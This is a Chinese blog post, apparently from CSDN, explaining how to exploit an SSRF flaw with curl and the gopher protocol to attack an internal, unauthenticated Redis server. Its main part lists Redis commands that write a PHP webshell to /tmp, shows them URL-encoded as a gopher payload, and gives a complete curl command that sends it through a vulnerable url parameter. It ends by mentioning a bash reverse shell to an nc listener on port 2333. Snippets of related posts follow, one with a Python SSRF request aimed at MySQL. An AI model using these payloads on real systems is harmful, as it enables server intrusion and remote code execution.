利用SSRF漏洞内网探测来攻击Redis(通过curl命令 & gopher协议)

已于 2022-03-31 22:57:56 修改
阅读量4.3k 收藏 7
点赞数 4
分类专栏: 网络安全 文章标签: docker 容器 云托管
于 2020-09-25 23:51:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43590389/article/details/108806057
版权

有时候有些漏洞不存在与Get请求中,此时Header CRLF方法就不行了,下面给出第二种方式

Gopher协议支持发出GET、POST请求:可以先拦截get请求包和post请求包,再构造成符合Gopher协议的请求(利用BP)。gopher协议是ssrf利用中一个最强大的协议。
可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求,还可以攻击内网未授权MySQL。

gopher 协议的精髓就在于可以在特定的端口上进行相关命令的执行。

Gopher协议的优势在于可以发送多种格式的数据包,这是就存在很大的利用空间。

gopher协议+ curl命令伪造POST请求包发给内网主机(已经扫到)。

gopher://IP:port/_{TCP/IP data stream}

redis.cmd文件为需要执行的redis命令,一行一条命令(写入换行符)

例如下列操作

flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save

转换成payload后就是

%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

然后利用curl命令

curl -v 'http://xxx.xxx.xx.xx/xx.php?url=gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

照例进行bash反弹shell

发送请求之前在公网机开启nc监听端口2333,后续步骤类似前一种方式。

Am0o0s
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF漏洞Redis利用
weixin_39664643的博客
01-21 3285
SSRF漏洞Redis利用SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外探测攻击服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击Redis SSRF攻击Redis 当存在SSRF漏洞且内Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 5025
前言 之前关于SSRFredis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
什么是SSRF攻击?该如何防御SSRF攻击?_,来防止ssrf攻击(1)
最新发布
2401_84968127的博客
05-14 968
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上络安全知识点!真正的体系化!
curlgopher协议ssrf利用
Z_Grant的博客
11-05 7154
文章目录一、基础知识的学习(1) cURL(2) PHP的curl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
利用SSRFgopherRedis未授权(.py版)
qq_44324297的博客
07-13 196
利用SSRFgopherRedis未授权(.py版) docker,lamp
curl命令使用
摔不死的笨鸟的博客
07-28 321
解决apt-get /var/lib/dpkg/lock-frontend 问题 运行 apt-get 时报如下错 E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable) E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击服务[+] 扫描内部络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第三节 SSRF利用 - 内资源访问-01
09-15
&quot;第三节 SSRF利用 - 内资源访问-01&quot; 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
WebLogic SSRF漏洞修复
11-25
WebLogic SSRF漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
curl:用于使用URL语法传输数据的命令行工具和库,支持DICT,FILE,FTP,FTPS,GOPHERGOPHERS,HTTP,HTTPS,IMAP,IMAPS,LDAP,LDAPS,MQTT,POP3,POP3S,RTMP,RTMPS, RTSP,SCP,SFTP,SMB,SMBS,SMTP,SMTPS,TELNET和TFTP。 libcurl提供了许多强大的功能
01-31
Curl是用于传输使用URL语法指定的数据的命令行工具。 阅读或了解如何使用curl。 阅读了解如何安装Curl。 libcurlcurl用来完成其工作的库。 您的软件可以随时使用它。 阅读以了解操作方法! 您可以在找到最常见问题的答案。 研究中的分发条款。 联系 如果您有任何问题,疑问,想法或建议,请通过适当的与我们。 在中列出了项目的所有贡献者。 站 访问以获取最新新闻和下载。 吉特 要从Git服务器下载最新资源,请执行以下操作: git clone https://github.com/curl/curl.git (您将创建一个名为curl的目录,并充满源代码) 安全问题 通过而不是公开报告可疑的安全问题! 注意 Curl包含部分源代码,这些源代码是(1998)Kungliga TekniskaH&ouml;gskolan版权所有(c)1998。 为了遵守分发条款,此处包含此通知。 支持者 谢谢我们所有的支持者! :folded_hands: [] 赞助商 通过成为赞助者来支持该项目。 您的徽标将显示在此处,并带有指向您站的链接。 []
【愚公系列】2023年05月 Web渗透测试之攻击Redis
热门推荐
时光隧道
08-24 5万+
Redis的内渗透是指攻击利用漏洞或者弱密码进入Redis服务器所在的内,然后利用Redis服务本身的漏洞或者弱密码拿到Redis服务器的控制权,并继续向内内的其他计算机和服务发起攻击。这种攻击方式在内部络防火墙被绕过的情况下非常有效,因此需要加强Redis本身的安全保护措施,并加强内安全防范措施。
php curl ssrf,CTFHUB技能树-SSRF【POST请求】
weixin_36043142的博客
03-16 663
CTFHUB SSRF POST请求废话首先开始解题构造gopher数据构造获取flag的请求废话最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.开始解...
curl 请求没反应_理解Redis的反应堆模式
weixin_39996496的博客
12-29 487
本文首发于:理解Redis的反应堆模式​mp.weixin.qq.com微信公众号:后端技术指南针欢迎关注 接收最新文章!1. Redis络模型Redis基于Reactor模式(反应堆模式)开发了自己的络模型,形成了一个完备的基于IO复用的事件驱动服务器,但是不由得浮现几个问题: 为什么要使用Reactor模式呢? Redis如何实现自己的Reactor模式?2. Reactor模式的背...
php curl ssrf,ssrf漏洞学习(PHP)
weixin_29963537的博客
03-16 1499
自己最近原本是想深入的学习一下关于xss、csrf的东西的,可是感觉这些东西需要有很好的js的基础来进行学习。。还有感觉自己感觉也差不多该要学习内渗透了。。正好ssrf在内这一块也是比较有用的。于是现在学习一下。我这里面是以php里面的curl为例子来学习的。漏洞代码如下$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);...
SSRF漏洞理解进阶&SSRF+gopher打内redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 8078
SSRF漏洞理解进阶&SSRF+gopher打内redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内&代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
WEB安全工具-curl
深度安全实验室
09-17 923
curl
并发CURL访问并通过REDIS来控制并发数
crimeheaven的专栏
05-25 2841
// 队列redis连接操作     public function RedisConnect() {         $queue = Yii::app()->queue_redis;         $server = $queue->host;         $port = $queue->port;         $timeout = $queue->timeOut;
ssrf dict MySQL_ssrf漏洞利用(内探测、打redis)
05-23
SSRF(Server-Side Request Forgery)是一种常见的Web安全漏洞,常被用于攻击内部络,获取敏感信息等。而MySQL SSF漏洞则是一种特殊的SSRF漏洞,可以通过构造恶意请求,向MySQL数据库发送任意数据请求,导致数据库的敏感信息泄露或者被攻击利用进行内探测、打redis等操作。 下面是一个简单的漏洞利用代码: ```python import requests # 构造恶意请求 payload = &#39;http://127.0.0.1:3306/select%20@@version&#39; # 发送请求 url = &#39;http://localhost/ssrf.php?url=&#39; + payload response = requests.get(url) # 输出结果 print(response.text) ``` 上面的代码中,我们构造了一个恶意请求,通过在URL参数中传入payload,来向MySQL数据库发送查询语句,获取数据库版本信息。 如果漏洞存在,并且服务器端没有对URL参数进行严格的过滤和校验,那么攻击者就可以通过构造各种恶意请求,向内部络发送各种数据请求,获取敏感信息,或者进行内探测、打redis等操作。 为了防止MySQL SSF漏洞利用,我们需要在服务器端对URL参数进行严格的过滤和校验,避免攻击者构造恶意请求进行攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值